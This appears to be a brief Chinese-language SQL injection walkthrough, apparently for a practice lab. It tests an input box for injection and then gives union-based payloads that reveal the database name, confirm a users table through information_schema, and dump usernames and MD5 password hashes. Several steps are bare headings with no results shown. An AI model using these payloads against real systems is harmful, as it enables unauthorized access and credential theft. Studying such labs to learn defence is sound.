1.首先,我们发现有个输入框,判断是否存在注入点
输入1:
输入1':
输入1 and 1=1:
输入1 and 1=2:
2:猜测sql语句:
3:爆破:
首先爆库:1' union select 1,database()
备注:union的使用条件:
猜测会有一张users表
爆users表的列:
1' union select 1,table_name from information_schema.tables where table_name='users'#
爆破user和password字段内容:
1' union select 1,concat(user,password) from users#
密文为md5加密,以
81dc9bdb52d04dc20036dbd8313ed055为例: